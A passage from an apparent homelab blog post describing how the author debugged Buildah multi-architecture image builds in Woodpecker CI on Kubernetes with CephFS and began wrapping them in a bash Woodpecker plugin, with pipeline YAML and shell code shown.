right solution would be to move the storage onto my pipeline volume, where before
it just sat in the container&rsquo;s own filesystem, leading to the above &ldquo;OverlayFS on OverlayFS&rdquo; error. I did this by adding <code>--root /woodpecker</code>
to the Buildah command.</p>
<p>And then I got the next one:</p>
<pre tabindex="0"><code>STEP 1/2: FROM alpine:3.22.1
Error: creating build container: could not find &#34;netavark&#34; in one of [/usr/local/libexec/podman /usr/local/lib/podman /usr/libexec/podman /usr/lib/podman].  To resolve this error, set the helper_binaries_dir key in the `[engine]` section of containers.conf to the directory containing your helper binaries.
</code></pre><p>This was fixed rather easily by adding <code>netavark</code> to the Buildah image. I had a
similar error next, about <code>iptables</code> not being available. So I installed that
one as well.</p>
<p>But that wasn&rsquo;t all. Oh no, here&rsquo;s another error:</p>
<pre tabindex="0"><code>buildah --root /woodpecker build -t testing:0.1 --build-arg alpine_ver=3.22.1 -f testing/Containerfile testing/
STEP 1/2: FROM alpine:3.22.1
WARNING: image platform (linux/arm64/v8) does not match the expected platform (linux/amd64)
STEP 2/2: RUN apk --no-cache update	&amp;&amp; apk --no-cache add buildah
exec container process `/bin/sh`: Exec format error
Error: building at STEP &#34;RUN apk --no-cache update	&amp;&amp; apk --no-cache add buildah&#34;: while running runtime: exit status 1
</code></pre><p>That one confused me a little bit, to be honest. It wasn&rsquo;t difficult to fix, I just
had to add the <code>--platform linux/amd64</code> option to the Buildah command. What
confused me was that Buildah didn&rsquo;t somehow figure that out for itself.</p>
<p>And this was the point where I realized that my two CI steps, one for amd64, one
for arm64, did not run in parallel. The one started only after the other had failed.
One <code>kubectl describe -n woodpecker pods wp-...</code> later, I saw that that was
because the Pod which launched second failed to mount the pipeline volume. And
that in turn was because I had switched to an SSD-backed Ceph RBD for the volume,
to improve speed. But RBDs are, by their nature as block devices, RWO, and cannot
be mounted by multiple Pods.</p>
<p>I switched the volumes back to CephFS and was met with the same error I had
seen previously and &ldquo;fixed&rdquo; by moving Buildah&rsquo;s storage onto the pipeline volume:</p>
<pre tabindex="0"><code>time=&#34;2025-08-07T21:56:14Z&#34; level=error msg=&#34;&#39;overlay&#39; is not supported over &lt;unknown&gt; at \&#34;/woodpecker/overlay\&#34;&#34;
Error: kernel does not support overlay fs: &#39;overlay&#39; is not supported over &lt;unknown&gt; at &#34;/woodpecker/overlay&#34;: backing file system is unsupported for this graph driver
time=&#34;2025-08-07T21:56:14Z&#34; level=warning msg=&#34;failed to shutdown storage: \&#34;kernel does not support overlay fs: &#39;overlay&#39; is not supported over &lt;unknown&gt; at \\\&#34;/woodpecker/overlay\\\&#34;: backing file system is unsupported for this graph driver\&#34;&#34;
</code></pre><p>I&rsquo;m not sure why it said &ldquo;unknown&rdquo;, but the filesystem was CephFS. After some
searching, I found out that OverlayFS and CephFS are seemingly incompatible. But
the issue was fixable by adding <code>--storage-driver=vfs</code> to the Buildah command.
The VFS driver is a bit older than OverlayFS, and a bit slower. But at least
it works on CephFS.</p>
<p>And believe it or not, that was the last error. After adding the <code>--storage</code>
option, the build ran through cleanly. At this point, my Woodpecker workflow
looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;.woodpecker/testing.yaml&#39;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;testing/*&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">variables</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;alpine-version</span> <span style="color:#e6db74">&#39;3.22.1&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build amd64 image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/buildah:0.4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">buildah --root /woodpecker build --storage-driver=vfs --platform linux/amd64 -t testing:0.1 --build-arg alpine_ver=3.22.1 -f testing/Containerfile testing/</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: []
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">privileged</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">backend_options</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#e6db74">&#34;amd64&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build arm64 image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/buildah:0.4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">buildah --root /woodpecker build --storage-driver=vfs --platform linux/arm64 -t testing:0.1 --build-arg alpine_ver=3.22.1 -f testing/Containerfile testing/</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: []
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">privileged</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">backend_options</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#e6db74">&#34;arm64&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">push image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/buildah:0.4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">sleep 10000</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: [<span style="color:#e6db74">&#34;build amd64 image&#34;</span>, <span style="color:#e6db74">&#34;build arm64 image&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">privileged</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span></code></pre></div><p>With this configuration, the two builds for amd64 and arm64 are run in parallel,
and the final <code>push image</code> step would be responsible for combining the
images into a single manifest and pushing it all to my Harbor instance.</p>
<p>I ran a test build and then exec&rsquo;d into the Pod when the pipeline arrived at the
<code>push image</code> step. I used the following commands to combine the manifests
and push them up to Harbor:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>buildah --root /woodpecker --storage-driver<span style="color:#f92672">=</span>vfs manifest create harbor.example.com/homelab/testing:0.1
</span></span><span style="display:flex;"><span>buildah --root /woodpecker --storage-driver<span style="color:#f92672">=</span>vfs manifest add harbor.example.com/homelab/testing:0.1 3883d7a9067d
</span></span><span style="display:flex;"><span>buildah --root /woodpecker --storage-driver<span style="color:#f92672">=</span>vfs manifest add harbor.example.com/homelab/testing:0.1 0130169db3bb
</span></span><span style="display:flex;"><span>buildah login https://harbor.example.com
</span></span><span style="display:flex;"><span>buildah --root /woodpecker --storage-driver<span style="color:#f92672">=</span>vfs manifest push harbor.example.com/homelab/testing:0.1 docker://harbor.example.com/homelab/testing:0.1
</span></span></code></pre></div><p>The problematic thing about this approach was that I had no way of knowing the
correct values for the image names in the <code>manifest add</code> commands, where I used
the image hashes in this example. I could of course set separate names for the
image, e.g. with the platform in the name. But then I would have to remember to
do that every time I create a new pipeline.</p>
<p>Instead, I decided to go one step further and check how painful it would be
to turn my simple command-based steps into a Woodpecker plugin.</p>
<h2 id="building-a-woodpecker-plugin">Building a Woodpecker plugin</h2>
<p>And it turns out: It isn&rsquo;t complicated at all. The docs for <a href="https://woodpecker-ci.org/docs/usage/plugins/creating-plugins">new Woodpecker plugins</a>
is rather short and sweet. Plugins need to be containerized, and they need to have
their program set as the entrypoint in the image. And that&rsquo;s it. Any options given
in the step are forwarded to the step container via environment variables, so there&rsquo;s
nothing special to be done at all.</p>
<p>That was good news, as I was a bit afraid I would have to write some Go. But no,
just pure bash was enough.</p>
<p>In the final result, my pipeline for the testing image will look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;.woodpecker/testing.yaml&#39;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;testing/*&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">variables</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;alpine-version</span> <span style="color:#e6db74">&#39;3.22.1&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;image-version</span> <span style="color:#e6db74">&#39;0.2&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;buildah-config</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">context</span>: <span style="color:#ae81ff">testing/</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">containerfile</span>: <span style="color:#ae81ff">testing/Containerfile</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build_args</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">alpine_ver</span>: <span style="color:#75715e">*alpine-version</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build amd64 image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/woodpecker-plugin-buildah:latest</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&lt;&lt;</span>: <span style="color:#75715e">*buildah-config</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">platform</span>: <span style="color:#ae81ff">linux/amd64</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: []
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">backend_options</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#e6db74">&#34;amd64&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build arm64 image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/woodpecker-plugin-buildah:latest</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&lt;&lt;</span>: <span style="color:#75715e">*buildah-config</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">platform</span>: <span style="color:#ae81ff">linux/arm64</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: []
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">backend_options</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#e6db74">&#34;arm64&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">push image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/woodpecker-plugin-buildah:latest</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">manifest_platforms</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;linux/arm64&#34;</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;linux/amd64&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">latest</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">1.5</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">repo</span>: <span style="color:#ae81ff">harbor.example.com/homelab/testing</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">username</span>: <span style="color:#ae81ff">ci</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">password</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">container-registry</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: [<span style="color:#e6db74">&#34;build amd64 image&#34;</span>, <span style="color:#e6db74">&#34;build arm64 image&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">privileged</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span></code></pre></div><p>When a Woodpecker plugin is launched, it gets all of the values under <code>settings:</code>
handed in as environment variables.
A normal key/value pair like <code>type: push</code> would appear as <code>PLUGIN_TYPE=&quot;push&quot;</code> in
the plugin&rsquo;s container.
Lists like the <code>tags</code> or <code>manifest_platforms</code> appear as comma-separated lists in,
e.g. <code>PLUGIN_TAGS=&quot;latest,1.5&quot;</code>.
Objects are a bit more complicated, and they&rsquo;re handed over as JSON objects, e.g.
<code>PLUGIN_BUILD_ARGS='{&quot;alpine_ver&quot;: &quot;3.22.1&quot;}''</code>.</p>
<p>First, there is a bit of a preamble in the script, to check whether required
config options have been set and Buildah is available:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>DATA_ROOT<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/woodpecker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> ! command -v buildah; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;buildah not found, exiting.&#34;</span>
</span></span><span style="display:flex;"><span>  exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_TYPE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;PLGUIN_TYPE not set, exiting.&#34;</span>
</span></span><span style="display:flex;"><span>  exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span></code></pre></div><p>Then, depending on the <code>PLUGIN_TYPE</code> variable, either the <code>build</code> or the <code>push</code>
function is executed, while either builds the image for a single platform or
combines multiple platforms into a single manifest and pushes it all to the
given registry:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_TYPE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;build&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Running build...&#34;</span>
</span></span><span style="display:flex;"><span>  build <span style="color:#f92672">||</span> exit $?
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">elif</span> <span style="color:#f92672">[[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_TYPE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;push&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Running push...&#34;</span>
</span></span><span style="display:flex;"><span>  push <span style="color:#f92672">||</span> exit $?
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Unknown type </span><span style="color:#e6db74">${</span>PLUGIN_TYPE<span style="color:#e6db74">}</span><span style="color:#e6db74">, exiting&#34;</span>
</span></span><span style="display:flex;"><span>  exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>exit <span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>And here is the <code>build</code> function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>build<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_CONTEXT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_CONTEXT not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_PLATFORM<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_PLATFORM not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_CONTAINERFILE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_CONTAINERFILE not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_BUILD_ARGS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    BUILD_ARGS<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>get_build_args <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_BUILD_ARGS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  command<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;buildah \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">--root </span><span style="color:#e6db74">${</span>DATA_ROOT<span style="color:#e6db74">}</span><span style="color:#e6db74"> \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">build \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">--storage-driver=vfs \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">--platform </span><span style="color:#e6db74">${</span>PLUGIN_PLATFORM<span style="color:#e6db74">}</span><span style="color:#e6db74"> \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-t </span><span style="color:#e6db74">${</span>PLUGIN_PLATFORM<span style="color:#e6db74">}</span><span style="color:#e6db74">:0.0 \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74"></span><span style="color:#e6db74">${</span>BUILD_ARGS<span style="color:#e6db74">}</span><span style="color:#e6db74"> \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-f </span><span style="color:#e6db74">${</span>PLUGIN_CONTAINERFILE<span style="color:#e6db74">}</span><span style="color:#e6db74"> \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74"></span><span style="color:#e6db74">${</span>PLUGIN_CONTEXT<span style="color:#e6db74">}</span><span style="color:#e6db74"> \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Running command: </span><span style="color:#e6db74">${</span>command<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#e6db74">${</span>command<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span> $?
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>It again starts out with some checks to make sure the required variables are set.
Then it runs the <code>buildah build</code> command as in the previous setup with the manual
command. The one &ldquo;special&rdquo; thing I&rsquo;m doing here is that I tag the new image with
the <code>PLUGIN_PLATFORM</code> variable and the <code>:0.0</code> version. The storage for the builders
is entirely temporary, so I will never have multiple versions in the storage,
and this allows me to make the names of the images predictable in the later
<code>push</code> step. So at the end of the function&rsquo;s run, I would have images <code>linux/amd64:0.0</code>
and <code>linux/arm64:0.0</code> in the same storage.</p>
<p>Which then brings us to the <code>push</code> function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>push<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_REPO<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_REPO not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_TAGS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_TAGS not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>    TAGS<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_TAGS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | tr <span style="color:#e6db74">&#39;,&#39;</span> <span style="color:#e6db74">&#39; &#39;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_MANIFEST_PLATFORMS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_MANIFEST_PLATFORMS not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>    PLATFORMS<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_MANIFEST_PLATFORMS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | tr <span style="color:#e6db74">&#39;,&#39;</span> <span style="color:#e6db74">&#39; &#39;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_USERNAME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_USERNAME not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
